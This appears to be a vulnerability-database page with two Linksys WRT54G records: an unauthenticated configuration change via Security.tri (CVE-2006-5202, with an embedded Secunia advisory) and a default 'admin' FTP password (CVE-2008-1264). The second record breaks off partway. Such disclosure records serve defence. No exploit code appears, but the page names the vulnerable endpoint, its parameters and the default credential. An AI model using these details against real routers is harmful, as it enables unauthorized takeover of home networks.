Vulnerability from variot - Updated: 2023-12-18 11:20Linksys WRT54g firmware 1.00.9 does not require credentials when making configuration changes, which allows remote attackers to modify arbitrary configurations via a direct request to Security.tri, as demonstrated using the SecurityMode and layout parameters, a different issue than CVE-2006-2559. Linksys WRT54G routers do not properly validate user credentials before allowing configuration changes. This vulnerability CVE-2006-2559 Is a different vulnerability.By a third party Security.tri Any setting may be changed through a direct request to. Linksys WRT54GS is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requring authentication. Linksys WRT54GS is prone to an authentication-bypass vulnerability. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device. This issue is reported to affect firmware version 1.00.9; other firmware versions may also be affected. Linksys WRT54GS is a wireless router device that combines several functions.
Hardcore Disassembler / Reverse Engineer Wanted!
Want to work with IDA and BinDiff? Want to write PoC's and Exploits?
Your nationality is not important. We will get you a work permit, find an apartment, and offer a relocation compensation package.
http://secunia.com/hardcore_disassembler_and_reverse_engineer/
TITLE: Linksys WRT54G Configuration Manipulation and Request Forgery
SECUNIA ADVISORY ID: SA21372
VERIFY ADVISORY: http://secunia.com/advisories/21372/
CRITICAL: Less critical
IMPACT: Hijacking, Manipulation of data
WHERE:
From remote
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: Ginsu Rabbit has reported a vulnerability and a security issue in Linksys WRT54G, which can be exploited by malicious people to conduct cross-site request forgery attacks and manipulate the configuration. disable wireless security).
2) An error exists in the web interface caused due to the device allowing users to change the router configuration via HTTP requests without performing any validity checks to verify the user's request.
SOLUTION: Filter traffic to affected devices and do not visit untrusted web sites while being logged in to the device.
PROVIDED AND/OR DISCOVERED BY: Ginsu Rabbit
ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048495.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200610-0506",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.00.9"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.01.0.9"
},
{
"model": "wrt54h",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "4.71.1"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v51.0.10"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:1.00.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5202"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ginsu Rabbit is credited with the discovery of this vulnerability.",
"sources": [
{
"db": "BID",
"id": "19347"
}
],
"trust": 0.3
},
"cve": "CVE-2006-5202",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2006-5202",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-21310",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-5202",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#930364",
"trust": 0.8,
"value": "1.98"
},
{
"author": "CNNVD",
"id": "CNNVD-200610-087",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-21310",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54g firmware 1.00.9 does not require credentials when making configuration changes, which allows remote attackers to modify arbitrary configurations via a direct request to Security.tri, as demonstrated using the SecurityMode and layout parameters, a different issue than CVE-2006-2559. Linksys WRT54G routers do not properly validate user credentials before allowing configuration changes. This vulnerability CVE-2006-2559 Is a different vulnerability.By a third party Security.tri Any setting may be changed through a direct request to. Linksys WRT54GS is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requring authentication. \nLinksys WRT54GS is prone to an authentication-bypass vulnerability. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device. \nThis issue is reported to affect firmware version 1.00.9; other firmware versions may also be affected. Linksys WRT54GS is a wireless router device that combines several functions. \n\n----------------------------------------------------------------------\n\nHardcore Disassembler / Reverse Engineer Wanted!\n\nWant to work with IDA and BinDiff?\nWant to write PoC\u0027s and Exploits?\n\nYour nationality is not important. \nWe will get you a work permit, find an apartment, and offer a\nrelocation compensation package. \n\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Configuration Manipulation and Request Forgery\n\nSECUNIA ADVISORY ID:\nSA21372\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/21372/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nHijacking, Manipulation of data\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nGinsu Rabbit has reported a vulnerability and a security issue in\nLinksys WRT54G, which can be exploited by malicious people to conduct\ncross-site request forgery attacks and manipulate the configuration. disable wireless security). \n\n2) An error exists in the web interface caused due to the device\nallowing users to change the router configuration via HTTP requests\nwithout performing any validity checks to verify the user\u0027s request. \n\nSOLUTION:\nFilter traffic to affected devices and do not visit untrusted web\nsites while being logged in to the device. \n\nPROVIDED AND/OR DISCOVERED BY:\nGinsu Rabbit\n\nORIGINAL ADVISORY:\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048495.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "PACKETSTORM",
"id": "48845"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-21310",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-21310"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#930364",
"trust": 3.3
},
{
"db": "SECUNIA",
"id": "21372",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2006-5202",
"trust": 2.5
},
{
"db": "BID",
"id": "19347",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1016638",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "5926",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087",
"trust": 0.7
},
{
"db": "MILW0RM",
"id": "5926",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20060804 LINKSYS WRT54G AUTHENTICATION BYPASS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-21310",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "48845",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "PACKETSTORM",
"id": "48845"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"id": "VAR-200610-0506",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-21310"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:20:05.069000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5202"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-august/048495.html"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/930364"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/19347"
},
{
"trust": 1.7,
"url": "https://kinqpinz.info/lib/wrt54g/"
},
{
"trust": 1.7,
"url": "https://kinqpinz.info/lib/wrt54g/own2.txt"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1016638"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/21372"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5926"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/21372/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5202"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-5202"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5926"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "/archive/1/452020"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "PACKETSTORM",
"id": "48845"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "PACKETSTORM",
"id": "48845"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#930364"
},
{
"date": "2006-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-21310"
},
{
"date": "2006-08-04T00:00:00",
"db": "BID",
"id": "19347"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"date": "2006-08-10T00:40:54",
"db": "PACKETSTORM",
"id": "48845"
},
{
"date": "2006-10-10T04:06:00",
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"date": "2006-08-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-11-21T00:00:00",
"db": "CERT/CC",
"id": "VU#930364"
},
{
"date": "2017-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-21310"
},
{
"date": "2006-11-22T16:00:00",
"db": "BID",
"id": "19347"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"date": "2017-10-11T01:31:18.593000",
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"date": "2006-10-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G routers do not properly validate user credentials",
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access verification error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
],
"trust": 0.6
}
}
VAR-200803-0060
Vulnerability from variot - Updated: 2023-12-18 10:52The Linksys WRT54G router has "admin" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file. Linksys WRT54G Router is prone to a remote security vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0060",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.8,
"vendor": "cisco linksys",
"version": null
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1264"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85075"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1264",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2008-1264",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-31389",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1264",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-142",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-31389",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G router has \"admin\" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file. Linksys WRT54G Router is prone to a remote security vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "VULHUB",
"id": "VHN-31389"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1264",
"trust": 2.8
},
{
"db": "XF",
"id": "41126",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142",
"trust": 0.7
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "BID",
"id": "85075",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31389",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"id": "VAR-200803-0060",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T10:52:59.565000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
}
]
},
"problemtype_data": {
"@context": {
